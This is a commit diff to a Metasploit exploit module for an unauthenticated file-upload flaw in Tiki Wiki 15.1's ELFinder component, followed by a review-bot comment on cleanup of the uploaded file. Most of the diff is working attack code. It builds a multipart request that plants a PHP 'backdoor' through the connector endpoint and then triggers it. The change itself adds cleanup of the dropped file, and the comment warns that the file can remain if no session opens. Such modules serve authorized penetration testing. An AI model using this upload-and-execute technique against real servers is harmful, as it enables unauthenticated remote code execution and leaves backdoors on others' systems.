Add FileDropper to cleanup properly
parent
43833c8756
commit
2471e8bc8c
|
@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -16,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a file upload vulnerability in Tiki Wiki <= 15.1
|
||||
which could be abused to allow unauthenticated users to execute arbitrary code
|
||||
under the context of the webserver user.
|
||||
under the context of the web server user.
|
||||
|
||||
The issue comes with one of the 3rd party components. Name of that components is
|
||||
ELFinder -version 2.0-. This components comes with default example page which
|
||||
|
@ -24,9 +25,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Default configuration does not force validations such as file extension, content-type etc.
|
||||
Thus, unauthenticated user can upload PHP file.
|
||||
|
||||
The exploit has been tested on Debian 8.x 64bit and Tiki Wiki 15.1.
|
||||
The exploit has been tested on Debian 8.x 64-bit and Tiki Wiki 15.1.
|
||||
},
|
||||
'Author' =>
|
||||
'Author' =>
|
||||
[
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # Vulnerability discovery and Metasploit module
|
||||
],
|
||||
|
@ -60,30 +61,38 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'method' => 'GET',
|
||||
'uri' => url
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
filename = rand_text_alpha(8 + rand(4)) + '.php'
|
||||
register_file_for_cleanup(filename)
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part('upload', nil, nil, 'form-data; name="cmd"')
|
||||
data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
|
||||
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
|
||||
print_status("Uploading backdoor file.")
|
||||
|
||||
print_status("Uploading backdoor file: #{filename}")
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "vendor_extra/elfinder/php/connector.minimal.php"),
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => data.to_s
|
||||
})
|
||||
|
||||
if res && res.code == 200
|
||||
print_good("Backdoor successfully created.")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
|
||||
end
|
||||
|
||||
print_status("Trigging the exploit...")
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
|
|
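Review bot: The `register_file_for_cleanup(filename)` call added at the top of `exploit` does not guarantee the uploaded PHP file is removed. As far as I know, FileDropper deletes registered files only once a session has opened, so if the upload succeeds but the trigger request yields no session, an executable file stays in a web-reachable directory on the tested server. The `res.code == 200` check before `print_good("Backdoor successfully created.")` also confirms only that the connector answered, not that the file was written, so the operator cannot tell from the output whether anything was left behind. I would document this above the register call with `# FileDropper only cleans up after a session opens; without one the file must be removed by hand`, and add `print_warning("Manual cleanup of #{filename} may be required")` on the no-session path. The rest of `exploit`, including the trigger request, lies outside this hunk, so the right place for the warning needs to be confirmed against the full method.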